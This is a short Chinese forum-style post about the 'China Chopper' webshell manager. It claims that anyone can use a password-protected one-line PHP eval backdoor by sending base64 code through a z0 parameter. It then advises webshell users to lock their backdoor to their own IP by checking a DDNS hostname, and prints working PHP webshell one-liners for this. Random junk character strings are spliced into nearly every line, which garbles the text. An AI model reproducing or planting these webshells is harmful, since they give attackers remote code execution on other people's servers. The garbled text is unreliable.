今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞8 M0 r6 h8 p3 y! w
7 Q" B! ~, r% p/ j
就算你设置了密码,使用了eval($_REQUEST['moyo']);* q1 q' U4 k" D
5 }2 ~( {" t( [但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门1 L* T+ h7 Z' S9 A$ d/ G2 H
1 W2 D, H' R1 `6 Y8 @8 D" }
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));3 n) a P9 B+ b. u. K* }% p6 h; E
1 r& P! l$ T- t2 y4 }, g直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了+ q! j9 z/ _: A/ X' M
7 G+ U, y9 a! k. Y! u
不知道是设计缺陷还是故意留的后门
$ I, }& R. e5 B" P( c g. i
# @) B2 F2 _3 u# M如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
7 I7 z. \" C r! t% \% A$ N/ v2 k8 l* \. D9 c
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
9 {9 D% N+ a- v. n, i& D
/ e0 E9 G0 U/ w2 F6 l/ O( l$ |' E, N然后一句话后门这样写8 u3 P8 o5 R* h1 B; ?3 o0 e
! `( x4 h/ D5 l# y: o4 |& c) P<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>* {1 m4 G' X) C) ]
这样就可以让一句话后门只允许自己的电脑连接了4 _* t$ B4 A3 n* @0 F$ @
2 }4 _" \ y+ n+ a9 j |